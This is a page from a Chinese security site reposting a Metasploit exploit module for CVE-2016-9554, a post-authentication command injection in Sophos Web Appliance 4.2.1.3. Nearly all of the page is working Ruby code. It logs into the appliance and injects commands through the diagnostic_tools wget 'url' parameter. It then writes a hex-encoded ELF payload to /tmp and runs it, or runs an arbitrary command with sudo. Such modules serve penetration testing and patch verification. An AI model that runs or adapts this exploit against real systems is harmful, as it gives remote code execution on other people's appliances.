首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Sophos Web Appliance 4.2.1.3 - DiagnosticTools Remote Command Injection (Metaspl
来源:xort @ Critical Start 作者:xort 发布时间:2017-02-22  
# Exploit Title: Sophos Web Appliance diagnostic_tools wget Remote Command Injection Vulnerablity
# Date: 12/12/2016
# Exploit Author: xort @ Critical Start
# Vendor Homepage: www.sophos.com
# Software Link: sophos.com/en-us/products/secure-web-gateway.aspx
# Version: 4.2.1.3
# Tested on: 4.2.1.3
#           
# CVE : CVE-2016-9554
 
# vuln:  diagnostic_tools command / host parameter /  MgrReport.php exploit
 
# Description PostAuth Sophos Web App FW <= v4.2.1.3 for capablities. This exploit leverages a command injection bug.
#
# xort @ Critical Start
 
require 'msf/core'
 
class MetasploitModule < Msf::Exploit::Remote
    Rank = ExcellentRanking
    include  Exploit::Remote::Tcp
        include Msf::Exploit::Remote::HttpClient
 
    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'Sophos Web Appliace <= v4.2.1.3 remote exploit',
                    'Description'    => %q{
                    This module exploits a remote command execution vulnerability in
                the Sophos Web Appliace Version <=  v4.2.1.3. The vulnerability exist in
                a section of the machine's adminstrative infertface for performing diagnostic
                network test with wget and unsanitized unser supplied information.
            },
            'Author'         =>
                [
                    'xort@Critical Start', # vuln + metasploit module
                ],
            'Version'        => '$Revision: 1 $',
            'References'     =>
                [
                    [ 'none', 'none'],
                ],
            'Platform'      => [ 'linux'],
            'Privileged'     => true,
             'Arch'          => [ ARCH_X86 ],
                        'SessionTypes'  => [ 'shell' ],
                        'Privileged'     => false,
 
                'Payload'        =>
                                {
                                  'Compat' =>
                                  {
                                        'ConnectionType' => 'find',
                                  }
                                },
 
            'Targets'        =>
                [
                    ['Linux Universal',
                        {
                                'Arch' => ARCH_X86,
                                'Platform' => 'linux'
                        }
                    ],
                ],
            'DefaultTarget' => 0))
 
            register_options(
                [
                    OptString.new('PASSWORD', [ false, 'Device password', "" ]),   
                        OptString.new('USERNAME', [ true, 'Device password', "admin" ]),   
                    OptString.new('CMD', [ false, 'Command to execute', "" ]), 
                    Opt::RPORT(443),
                ], self.class)
    end
 
        def do_login(username, password_clear)
                vprint_status( "Logging into machine with credentials...\n" )
 
                # vars
                timeout = 1550;
                style_key = Rex::Text.rand_text_hex(32)
 
                # send request 
                res = send_request_cgi(
                {
                      'method'  => 'POST',
                      'uri'     => "/index.php",
                      'vars_get' => {
               'c' => 'login',
            },
                      'vars_post' =>
                        {
 
                  'STYLE' => style_key,
              'destination' => '',
              'section' => '',
              'username' => username,
              'password' => password_clear,
                        }
                }, timeout)
 
                return style_key
        end
 
    def run_command(username, style_password, cmd)
 
        vprint_status( "Running Command...\n" )
 
        # send request with payload
        res = send_request_cgi({
            'method' => 'POST',
            'vars_post' => {
                'action' => 'wget',
                'section' => 'configuration',
                'STYLE' => style_password ,
                'url' => 'htt%3a%2f%2fwww.google.com%2f`'+cmd+'`',
                },
            'vars_get' => {
                'c' => 'diagnostic_tools',
            },
        })
 
    end
 
    
    def exploit
        # timeout
        timeout = 1550;
 
        # params
        password_clear = datastore['PASSWORD']
        user = datastore['USERNAME']
 
        # do authentication    
        style_hash = do_login(user, password_clear)
    
        vprint_status("STATUS hash authenticated: #{style_hash}\n")
            
        # pause to let things run smoothly
        sleep(5)
 
         #if no 'CMD' string - add code for root shell
                if not datastore['CMD'].nil? and not datastore['CMD'].empty?
 
                        cmd = datastore['CMD']
 
                        # Encode cmd payload
                        encoded_cmd = cmd.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2')
 
                        # kill stale calls to bdump from previous exploit calls for re-use
                        run_command(user, style_hash, ("sudo%20/bin/rm%20-f%20/tmp/n%20;printf%20\"#{encoded_cmd}\"%20>%20/tmp/n;%20chmod%20+rx%20/tmp/n;/tmp/n" ))
                else
                        # Encode payload to ELF file for deployment
                        elf = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw)
                        encoded_elf = elf.unpack("H*").join().gsub(/(\w)(\w)/,'\\\\\\x\1\2')
 
            # upload elf to /tmp/m , chmod +rx /tmp/m , then run /tmp/m (payload)
                        run_command(user, style_hash, ("echo%20-e%20#{encoded_elf}\>%20/tmp/m\;chmod%20%2brx%20/tmp/m\;/tmp/m"))
 
            # wait for magic
                        handler
            
                end
 
 
    end
# sophox-release
end
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Sophos Web Appliance 4.2.1.3 -
·Sonicwall 8.1.0.2-14sv - 'exte
·NETGEAR DGN2200v1/v2/v3/v4 - '
·Sonicwall 8.1.0.2-14sv - 'view
·Microsoft SQL Server Clr Store
·AlienVault OSSIM/USM <= 5.3.1
·WordPress 4.7 / 4.7.1 REST API
·EasyCom For PHP 4.0.0 - Buffer
·Advantech WebAccess 8.1 Post A
·EasyCom For PHP 4.0.0 - Denial
·TI Online Examination System 2
·Google Chrome - 'layout' Out-o
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved